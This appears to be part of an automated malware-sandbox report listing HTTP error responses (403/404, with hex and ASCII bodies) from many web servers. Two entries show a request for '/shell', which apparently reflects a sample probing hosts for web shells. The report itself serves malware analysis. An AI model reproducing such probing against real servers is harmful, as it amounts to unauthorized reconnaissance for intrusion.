      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 19 Jul 2022 11:07:08 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 13:06:56 GMTServer: TruVisionCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99X-FRAME-OPTIONS: SAMEORIGINData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 11:07:13 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 19 Jul 2022 11:07:13 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCONNECTION: closeCONTENT-LENGTH: 48CONTENT-TYPE: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>404 Not Found</h1></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Security-Policy: default-src 'self' *.dayagagas.id;font-src 'self' data: *.googleapis.com *.jsdelivr.net *.gstatic.com *.telerik.com *.pu.go.id *.dayagagas.id;img-src 'self' blob: data: *.xpora.id *.googleapis.com *.unsplash.com *.youtube.com *.amazonaws.com *.openstreetmap.org *.pu.go.id *.dayagagas.id;script-src 'self' 'unsafe-inline' 'unsafe-eval' *.jquery.com *.google.com moment.github.io *.amazonaws.com *.gstatic.com *.jsdelivr.net *.embedly.com unpkg.com *.cloudflare.com *.googletagmanager.com *.google-analytics.com *.googleapis.com *.telerik.com *.pu.go.id *.dayagagas.id;style-src 'self' 'unsafe-inline' *.googleapis.com *.jsdelivr.net *.cloudflare.com *.amazonaws.com unpkg.com vjs.zencdn.net accounts.google.com *.telerik.com *.pu.go.id *.dayagagas.id;frame-src 'self' *.google.com *.youtube.com *.amazonaws.com *.pu.go.id *.dayagagas.id;connect-src 'self' *.google-analytics.com *.amazonaws.com *.googleapis.com accounts.google.com *.pu.go.id *.dayagagas.id;media-src 'self' blob: *.googleapis.com *.amazonaws.com *.pu.go.id *.dayagagas.idX-DNS-Prefetch-Control: offExpect-CT: max-age=0X-Frame-Options: DENYStrict-Transport-Security: max-age=31536000X-Download-Options: noopenX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneReferrer-PolicData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: ADPycdunPy-ZNn6Z1i2aUT6t8Yab5-Q3icwKnZTaAzHzqY_UPPycYxN_wnMogivIEJZESY5DjPDWznxt2EgmVhgkFfdxKQContent-Type: application/xml; charset=UTF-8Content-Length: 127Date: Tue, 19 Jul 2022 11:07:16 GMTExpires: Tue, 19 Jul 2022 11:07:16 GMTCache-Control: private, max-age=0Server: UploadServerData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 2f 45 72 72 6f 72 3e Data Ascii: <?xml version='1.0' encoding='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message></Error>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 11:07:18 GMTServer: ApacheVary: Accept-EncodingContent-Length: 203Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 11:06:00 GMTServer: ApacheContent-Length: 203Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, no-storeContent-Type: text/html; charset=utf-8Via: 1.1 spaces-router (b642bf20b975)Date: Tue, 19 Jul 2022 11:07:18 GMTContent-Length: 549Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 20 73 75 63 68 20 61 70 70 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 2f 2f 77 77 77 2e 68 65 72 6f 6b 75 63 64 6e 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 73 2f 6e 6f 2d 73 75 63 68 2d 61 70 70 2e 68 74 6d 6c 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html> <head> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta charset="utf-8"> <title>No such app</title> <style media="screen"> html,body,iframe { margin: 0; padding: 0; } html,body { height: 100%; overflow: hidden; } iframe { width: 100%; height: 100%; border: 0; } </style> </head> <body> <iframe src="//www.herokucdn.com/error-pages/no-such-app.html"></iframe> </body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 134Content-Type: text/html; charset=UTF-8Date: Tue, 19 Jul 2022 11:07:18 GMTData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 34 30 33 3c 2f 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e Data Ascii: <!doctype html><meta charset="utf-8"><meta name=viewport content="width=device-width, initial-scale=1"><title>403</title>403 Forbidden
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 19 Jul 2022 11:07:18 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8Server: CaddyX-Content-Type-Options: nosniffDate: Tue, 19 Jul 2022 11:07:21 GMTContent-Length: 54Data Raw: 34 30 34 20 53 69 74 65 20 31 32 37 2e 30 2e 30 2e 31 3a 38 30 20 69 73 20 6e 6f 74 20 73 65 72 76 65 64 20 6f 6e 20 74 68 69 73 20 69 6e 74 65 72 66 61 63 65 0a Data Ascii: 404 Site 127.0.0.1:80 is not served on this interface
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Tue, 19 Jul 2022 11:07:21 GMTContent-Type: text/htmlContent-Length: 167Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: keep-aliveContent-Type: text/html; charset=utf-8Date: Tue, 19 Jul 2022 11:06:48 GMTServer: nginx/1.14.0 (Ubuntu)X-Ms-Request-Id: 192adb1a-2f6a-4299-b163-f70731fafe9bContent-Length: 232Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 33 2e 32 20 46 69 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 11:07:21 GMTContent-Type: text/plain; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingServer: APISIX/2.0Data Raw: 32 34 0d 0a 7b 22 65 72 72 6f 72 5f 6d 73 67 22 3a 22 34 30 34 20 52 6f 75 74 65 20 4e 6f 74 20 46 6f 75 6e 64 22 7d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 24{"error_msg":"404 Route Not Found"}0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Microsoft-IIS/8.5Date: Tue, 19 Jul 2022 11:07:12 GMTContent-Length: 0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Tue, 19 Jul 2022 11:07:22 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 19 Jul 2022 19:07:10 GMTContent-Type: text/htmlContent-Length: 566Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 699date: Tue, 19 Jul 2022 11:07:22 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 33 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 20 69 73 20 64 65 6e 69 65 64 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; 